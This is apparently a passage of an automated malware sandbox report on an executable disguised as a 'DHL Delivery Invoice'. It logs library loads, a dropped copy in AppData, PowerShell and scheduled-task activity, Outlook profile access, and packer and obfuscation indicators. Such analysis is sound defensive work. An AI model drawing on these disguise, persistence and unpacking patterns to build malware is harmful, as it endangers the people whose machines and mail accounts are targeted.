                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: DHL Delivery Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL Delivery Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.cs.Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.cs.Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.cs.Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E8E762 push ds; ret 9_2_00E8E763
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E80C6D push edi; retf 9_2_00E80C7A
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E8AEDE push edx; ret 9_2_00E8AEE5
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_06627670 push esp; iretd 9_2_06627679
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_06627C24 push esp; iretd 9_2_06627C2D
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_07F61F40 pushad ; iretd 10_2_07F61F4D
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A3FC8 pushfd ; iretd 10_2_086A3FD6
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A40FC pushfd ; iretd 10_2_086A40FE
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_03090C6D push edi; retf 14_2_03090C7A
                      Source: DHL Delivery Invoice.exeStatic PE information: section name: .text entropy: 7.469334701221808
                      Source: LIWBHGsz.exe.0.drStatic PE information: section name: .text entropy: 7.469334701221808
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, s3M8YEIWMsI4GaRjOl.csHigh entropy of concatenated method names: 'bugyGBoTgU', 'WGqynxvpqV', 'Y65yykZFHl', 'Bw1yrK8Sda', 'wQdyS3WG8L', 'yUfyHmPour', 'Dispose', 'xm97W2QMaX', 'MQI70HKbc0', 'ftQ73CAtHG'
